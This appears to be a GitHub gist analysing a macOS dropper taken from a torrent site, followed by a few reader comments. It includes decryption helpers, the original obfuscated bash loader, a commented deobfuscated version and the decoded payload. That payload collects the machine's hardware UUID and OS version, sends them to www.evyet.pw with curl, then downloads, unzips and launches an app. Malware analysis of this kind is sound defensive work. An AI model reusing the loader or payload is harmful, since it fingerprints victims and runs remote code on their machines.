Decrypted bash file of macOS malware downloaded from mac-torrents.io

decrypt.m

// file: decrypt.m
// "decrypts" a single base64-encoded string from a shitty macos malware.
// compile with: clang -o decrypt -framework Foundation decrypt.m

#import <Foundation/Foundation.h>
#include <stdint.h>

int main (int argc, const char * argv[]) {
  //NSString *string = @"TRYEGVoFAQ0HD1sGCg==";
  NSString *string = [NSString stringWithUTF8String: argv[1]];
  NSData *data = [[NSData alloc] initWithBase64EncodedString: string options: NSDataBase64DecodingIgnoreUnknownCharacters];
  NSString *decoded = [[NSString alloc] initWithData: data encoding: NSASCIIStringEncoding];

  NSLog(@"length = %i", (int) [decoded length]);

  NSMutableString *out = [[NSMutableString alloc] init];

  unichar key[] = {'b', 'i', 'u'};

  for(uint32_t i = 0; i < [decoded length]; i++) {
    unichar c = [decoded characterAtIndex: i];

    unichar processed = c ^ key[(i / 2) % 3];

    [out appendString: [NSString stringWithFormat: @"%C", processed]];
  }

  NSLog(@"%@", out);
}

decrypt_loop.asm

; file: decrypt_loop.asm
; runs the loop in the decrypt method of the malware and prints out
; contents of the rcx register.
; compile with: nasm -f macho64 decrypt_loop.asm
; link with:    ld -macosx_version_min 10.7.0 -lSystem -o decrypt_loop decrypt_loop.o
global start

section .text
start:
  xor        r12d, r12d
loop:
  mov        eax, r12d                                   ; XREF=+[Utilities decrypt:]+419
  mov        ecx, 0xaaaaaaab
  imul       rax, rcx
  shr        rax, 0x22
  lea        ebx, [rax+rax*2]
  add        ebx, ebx
  mov        rax, 10    ; fake get byte
  mov        ecx, r12d
  sub        ecx, ebx
  and        ecx, 0xfffffffe
;  xor        ax, word [ss:rbp+rcx]

  ; print offset
  push    rcx
  mov     rax, 0x2000004 ; write
  mov     rdi, 1 ; stdout
  mov     rsi, rsp
  mov     rdx, 1
  syscall
  pop     rcx

  inc        r12
  jmp        loop
  mov     rax, 0x2000001 ; exit
  mov     rdi, 0
  syscall

section .data
data: db "0", 2

macos_malware.sh

#!/bin/bash
_l() {
    _i=0;_x=0;
    for ((_i=0; _i<${#1}; _i+=2)) do
        __return_var="$__return_var$(printf "%02x" $(( ((0x${1:$_i:2})) ^ ((0x${2:$_x:2})) )) )"
        if (( (_x+=2)>=${#2} )); then ((_x=0)); fi
    done
    if [[ "$3" ]]; then eval "$3='$__return_var'"; else echo -n "$__return_var"; fi
}

_m() {
    _v=$(base64 --decode <(printf "$1"));_k=$(xxd -pu <(printf "$2"));
    __return_var="$(xxd -r -p <(_l "$_v" "$_k"))"
    if [[ "$3" ]]; then eval "$3='$__return_var'"; else echo -n "$__return_var"; fi
}
_y="2822812613"
_t="MTExOTFkNTA1MTVmMWQ1NDUwNDA1YTE4MzgzODdkN2Y3MTY5NjE3MjYxNmIwZjEwMGEwOTAwMDQwOTAyMDAwZTAzMDExYTNiNzM2NjYxNmM3Njc3N2Y3MzcxN2YwZjE0NDY0NDQ1MTY1NzQ0NDE1NDQ2MTg0MTQ0MTAzMjczNjI2ODZlNjA3OTY0Njc3NzA1MTA1NjU3NDY1YzVhNWU1MjU2MTc1NjVlNGI0NTEwM2M0NDVkNDg1MTQyNmQ0ODUwNDE0NTQ2NWM0MDVjMGYxMDBiMDAwNDA0MDAwYjAwMGEwYTAwMGEwOTAwMDQwOTAyMDAwZTAzMDEwYjA1MDcwMDA2MGIwYjFhMzgzODU3NDI2ZDQwNTQ0MTQxNTE1ZDVjMDUxMzE2MWU0MjQ0NmQ0ZTU3NDA0YjExMWY0NjQzNWM1NjRkNTE0NjZlNTQ0MDQ1NTg1YzVjMTExMDEyMzI0MjU3NDU0MjVhNWQ1NjZkNTU0ZDU4NTYwYjEzMTcxYTRkNDc1YjVjNTY1NzU4MTgxMTEyMzI1ZjUzNWI1OTViNTg1NDZjNWI1YzBmMTAxYzE5NTc1NTU5NWMxMjE1NWMxMjFhMTUxYTVmNWU0MTU3NWYxMjFmNGE1NTAzMTYxYzUwMTI3MTdkNjI1NDUwNDY1MDVlNDE1ZjdkNGE0MjVkNDM0NjcyNTQ0NTViNWI1NzEyNDQxMTU1NDQ1NDQzMTIxNTVkMTIxZjEzN2I3OTYxNWY1MzRjNTQ1ZDRhNWM2NzYzNzg3NzEwMTgwZjEyMWE2ZDFhMTgxYjZmMWIxYTE1MTI0NDExNDE1MzU1MTMxZjdkMTIxZjU2MTExNTQ1NzExZDE4MWExYTY5NjYxMzZmMWQxODExNzI2NDAzNzI0ODE2MWIxNDExNGYxMjRjNDAxMjE1NTU1MTE2MTY2ODY5MDI0MjQwNTE1ZjQ2MGM2YzZlMTUxMTEwMTIzMjNiNDc0NDVkMGUxMDUwNDY0NjQ4MGIxZDE5MTU0ODczNjg2MjZkN2M3ZTdmNzc3ODdkNGYxNzE2NDk3OTYxNjI2OTYzN2M2NzZjNzc0ZjA3NWM1YjUyMGMxNzQ5NTU1MzUxNTA1ODVjNTM2ZTVhNTY0NTE0NDEwNTE1NDk0NTU0NDA0MTUxNWQ1YzY3NTY0NzVmNTU0ZTE0NTcwZjE2NDM1ZTQxNjk0NzU2NDA0YjViNWQ1NjRjMTQ0NjBjMTc0OTdkN2M3MTY3NjE3MzY1NjI0ZTEwMzI0NjVmNDg2ZTQyNTc0NTViMGYxYTE2MWE1NTVhNDY1MzVjNDMxMjE3NDY1ZjQ4MWU2YTZlNjk2YjZhNjA2YTZhNjAxODEwM2M1MjQ2NDA1NDEyMWY1ZTAxN2UxNjEzMTc0OTRkNDA1ZTQ1MTMxMjA4MWU1NzU3NGUxZDVjNGQ1ZDVlMTYwMzBkMTQwOTEyMGMwNjExMTY0ZDQ1NWU0MjY3NDI1MzRjNTk0ZjE2M2I1MjQyNDg2ZDU2NTE0MzBmMTQxNTFiNWY1MzQ2NTc1NTQxMTIxYjU1MTMxZDRjNWY0MjE3Njk2YTZlNjk2YjZhNjA2YTFiMTcxMzEyM2M0NDVkNDg1MTQyMTIxNTYxMTIxNDE1NDg0NzU2NDg1YjQ4NmU0MjU3NDI0MDQ1NTc0MDU2NDUxMzEyMTQxNTQ4NDY1NTQyNmQ0ODUwNDY1ZTRjMTExMjE1NTYxMjFhMTU0OTU3NDE0MzZkNWM1YjQwNDUxMzEyMDgxMTFjNTY1ZDQ0MWQ1NjQ0NWU1YTExMDEwYzFlMDMxMjMyNDM1ZjE2MWM1NTEyMWM0OTQ2NTU0MTZkNDY1MDQ3NWE0NTEyMzg1ZTU4NWU1MzZlNWQ1MzU1NTcwZjFhMTUxYTUxNDM1NjQyMTgxZjVmMDkxMTFmNDAxMTExMTgxNjUzNDI0ODEzMTIwYTE5NWY0MTE4MWYwMzE4MTMxNjRkNTA0MzQyNjc1NjViNGE0YzEwMWYxODExMTIzMjQ0NWQ1NDQ0NWY1MzZlNWQ1MzU1NTcwZjFhMTUxYTUzNTI1YjVkMTgxZjVjMTgxMzE2NGQ2MTY0NzY0NTEwMTI0NDExNDE1MzU1MTMxZjdkMTIxZjU2MTExNTQ1NzE2ZDFhMTc2NDVkNTQ0NDVmNTM0MjFjNjk2NjFkNmYxMzE4MWQxODFiNzM2ZTA5NzI0MjFmMTgxMDE2M2I0NTVkNTQ0NzVmNWQ2ZTVjNTc1YzU2MGYxYTE2NDk0ZTVlNWU0MzVjNTY2ZDU2NTM1ZjVkMWUxZDE2MWUxNjAwMDg0ZjEwMTgzYjUxNWU1YzVjNTYxODE5NGExODEzMTY0ZDUwNDM0MjY3NTY1YjRhNGMxNjRkNTc1YTVlNWQ2ZDVjNTk1YzU3NGIxZTcwNWQ1NjQ2NTc1NjQ1NDExOTdjNTI1MTc3NjExMDE3MWIxMjNjNWU0MzU3NTYxMjFmNTkxMTEwMTI0YTUyNDI0ODZkNTY1MTQzNGYxMjRhNTU1YjU0NTc2ZDU2NTA1ZjUzNGMxMTEyMTUxZjUzNGE1NjQxMTYxMzQwMTAxODEwMTY0MzQyNTc0NTQyNWE1ZDU2NmQ1NTRkNTg1NjRiMTMxMzEwMWM0OTQ0NTc1ZDQ3NWI1NDZjNWM1OTVmNTc0NTEzMzgK"

eval "$(_m "$_t" "$_y")"

macos_malware_deobfuscated.sh

#!/bin/bash
process() {
    # i is the current position in the data, x is the current position
    # in the key.
    i=0
    x=0

    # iterate through the entire data, XORing every byte (as two hex digits) with
    # the key, wrapping the key around when the end is reached.
    for ((i=0; i<${#1}; i+=2)) do
        result="$result$(printf "%02x" $(( ((0x${1:$i:2})) ^ ((0x${2:$x:2})) )) )"

        # wrap key around when end is reached.
        if (( (x+=2)>=${#2} )); then 
          ((x=0));
        fi
    done

    # output result.
    echo -n "$result"
}

decode() {
    # decode data and key. xxd -pu outputs a stream of upper-case hex characters.
    decoded=$(base64 --decode <(printf "$1"));
    key=$(xxd -pu <(printf "$2"));

    # process the data, turn it from hex back into binary format.
    echo "$(xxd -r -p <(process "$decoded" "$key"))"
}

key="2822812613"
data="MTExOTFkNTA1MTVmMWQ1NDUwNDA1YTE4MzgzODdkN2Y3MTY5NjE3MjYxNmIwZjEwMGEwOTAwMDQwOTAyMDAwZTAzMDExYTNiNzM2NjYxNmM3Njc3N2Y3MzcxN2YwZjE0NDY0NDQ1MTY1NzQ0NDE1NDQ2MTg0MTQ0MTAzMjczNjI2ODZlNjA3OTY0Njc3NzA1MTA1NjU3NDY1YzVhNWU1MjU2MTc1NjVlNGI0NTEwM2M0NDVkNDg1MTQyNmQ0ODUwNDE0NTQ2NWM0MDVjMGYxMDBiMDAwNDA0MDAwYjAwMGEwYTAwMGEwOTAwMDQwOTAyMDAwZTAzMDEwYjA1MDcwMDA2MGIwYjFhMzgzODU3NDI2ZDQwNTQ0MTQxNTE1ZDVjMDUxMzE2MWU0MjQ0NmQ0ZTU3NDA0YjExMWY0NjQzNWM1NjRkNTE0NjZlNTQ0MDQ1NTg1YzVjMTExMDEyMzI0MjU3NDU0MjVhNWQ1NjZkNTU0ZDU4NTYwYjEzMTcxYTRkNDc1YjVjNTY1NzU4MTgxMTEyMzI1ZjUzNWI1OTViNTg1NDZjNWI1YzBmMTAxYzE5NTc1NTU5NWMxMjE1NWMxMjFhMTUxYTVmNWU0MTU3NWYxMjFmNGE1NTAzMTYxYzUwMTI3MTdkNjI1NDUwNDY1MDVlNDE1ZjdkNGE0MjVkNDM0NjcyNTQ0NTViNWI1NzEyNDQxMTU1NDQ1NDQzMTIxNTVkMTIxZjEzN2I3OTYxNWY1MzRjNTQ1ZDRhNWM2NzYzNzg3NzEwMTgwZjEyMWE2ZDFhMTgxYjZmMWIxYTE1MTI0NDExNDE1MzU1MTMxZjdkMTIxZjU2MTExNTQ1NzExZDE4MWExYTY5NjYxMzZmMWQxODExNzI2NDAzNzI0ODE2MWIxNDExNGYxMjRjNDAxMjE1NTU1MTE2MTY2ODY5MDI0MjQwNTE1ZjQ2MGM2YzZlMTUxMTEwMTIzMjNiNDc0NDVkMGUxMDUwNDY0NjQ4MGIxZDE5MTU0ODczNjg2MjZkN2M3ZTdmNzc3ODdkNGYxNzE2NDk3OTYxNjI2OTYzN2M2NzZjNzc0ZjA3NWM1YjUyMGMxNzQ5NTU1MzUxNTA1ODVjNTM2ZTVhNTY0NTE0NDEwNTE1NDk0NTU0NDA0MTUxNWQ1YzY3NTY0NzVmNTU0ZTE0NTcwZjE2NDM1ZTQxNjk0NzU2NDA0YjViNWQ1NjRjMTQ0NjBjMTc0OTdkN2M3MTY3NjE3MzY1NjI0ZTEwMzI0NjVmNDg2ZTQyNTc0NTViMGYxYTE2MWE1NTVhNDY1MzVjNDMxMjE3NDY1ZjQ4MWU2YTZlNjk2YjZhNjA2YTZhNjAxODEwM2M1MjQ2NDA1NDEyMWY1ZTAxN2UxNjEzMTc0OTRkNDA1ZTQ1MTMxMjA4MWU1NzU3NGUxZDVjNGQ1ZDVlMTYwMzBkMTQwOTEyMGMwNjExMTY0ZDQ1NWU0MjY3NDI1MzRjNTk0ZjE2M2I1MjQyNDg2ZDU2NTE0MzBmMTQxNTFiNWY1MzQ2NTc1NTQxMTIxYjU1MTMxZDRjNWY0MjE3Njk2YTZlNjk2YjZhNjA2YTFiMTcxMzEyM2M0NDVkNDg1MTQyMTIxNTYxMTIxNDE1NDg0NzU2NDg1YjQ4NmU0MjU3NDI0MDQ1NTc0MDU2NDUxMzEyMTQxNTQ4NDY1NTQyNmQ0ODUwNDY1ZTRjMTExMjE1NTYxMjFhMTU0OTU3NDE0MzZkNWM1YjQwNDUxMzEyMDgxMTFjNTY1ZDQ0MWQ1NjQ0NWU1YTExMDEwYzFlMDMxMjMyNDM1ZjE2MWM1NTEyMWM0OTQ2NTU0MTZkNDY1MDQ3NWE0NTEyMzg1ZTU4NWU1MzZlNWQ1MzU1NTcwZjFhMTUxYTUxNDM1NjQyMTgxZjVmMDkxMTFmNDAxMTExMTgxNjUzNDI0ODEzMTIwYTE5NWY0MTE4MWYwMzE4MTMxNjRkNTA0MzQyNjc1NjViNGE0YzEwMWYxODExMTIzMjQ0NWQ1NDQ0NWY1MzZlNWQ1MzU1NTcwZjFhMTUxYTUzNTI1YjVkMTgxZjVjMTgxMzE2NGQ2MTY0NzY0NTEwMTI0NDExNDE1MzU1MTMxZjdkMTIxZjU2MTExNTQ1NzE2ZDFhMTc2NDVkNTQ0NDVmNTM0MjFjNjk2NjFkNmYxMzE4MWQxODFiNzM2ZTA5NzI0MjFmMTgxMDE2M2I0NTVkNTQ0NzVmNWQ2ZTVjNTc1YzU2MGYxYTE2NDk0ZTVlNWU0MzVjNTY2ZDU2NTM1ZjVkMWUxZDE2MWUxNjAwMDg0ZjEwMTgzYjUxNWU1YzVjNTYxODE5NGExODEzMTY0ZDUwNDM0MjY3NTY1YjRhNGMxNjRkNTc1YTVlNWQ2ZDVjNTk1YzU3NGIxZTcwNWQ1NjQ2NTc1NjQ1NDExOTdjNTI1MTc3NjExMDE3MWIxMjNjNWU0MzU3NTYxMjFmNTkxMTEwMTI0YTUyNDI0ODZkNTY1MTQzNGYxMjRhNTU1YjU0NTc2ZDU2NTA1ZjUzNGMxMTEyMTUxZjUzNGE1NjQxMTYxMzQwMTAxODEwMTY0MzQyNTc0NTQyNWE1ZDU2NmQ1NTRkNTg1NjRiMTMxMzEwMWM0OTQ0NTc1ZDQ3NWI1NDZjNWM1OTVmNTc0NTEzMzgK"

eval "$(decode "$data" "$key")"

macos_malware_payload.sh

#!/bin/bash 

ENC_PASS="2822812613"
APP_DOMAIN="www.evyet.pw"
APP_ROUTE="download/dlst"
unzip_password="316218228228228126133456789"

os_version="$(sw_vers -productVersion)" 
session_guid="$(uuidgen)" 
machine_id="$(echo -n "$(ioreg -rd1 -c IOPlatformExpertDevice | grep -o '"IOPlatformUUID" = "\(.*\)"' | sed -E -n 's@.*"([^"]+)"@\1@p')" | tr -dc '[[:print:]]')" 

url="http://${APP_DOMAIN}/${APP_ROUTE}?mid=${machine_id}&s=${session_guid}&o=${os_version}&p=${ENC_PASS}"
tmp_path="$(mktemp /tmp/XXXXXXXXX)"
curl -f0L "${url}" >/dev/null 2>&1 >> ${tmp_path} 
app_dir="$(mktemp -d /tmp/XXXXXXXX)/" 
unzip -P "${unzip_password}" "${tmp_path}" -d "${app_dir}" > /dev/null 2>&1 
rm -f ${tmp_path} 
file_name="$(grep -m1 -v "*.app" <(ls -1 "${app_dir}"))" 
volume_name="$(echo -n "${PWD}" | sed -E -n 's@^(/Volumes/[^/]+)/.*@\1@p')" 
volume_name="${volume_name// /%20}" 
chmod +x "${app_dir}${file_name}/Contents/MacOS"/* 
open -a "${app_dir}${file_name}" --args "s" "${session_guid}" "${volume_name}"

Hi Patrick, I have found your gist very interesting, can you explain a little bit more what's happening here?

Have you performed analysis of the binary? Your blog page has only part 1.

@OngLL yep, I never got around to publishing the second part unfortunately. We loaded it into Hopper and Ghidra, to be honest I don't really remember how far we got.

what does -rd1 do in ioreg?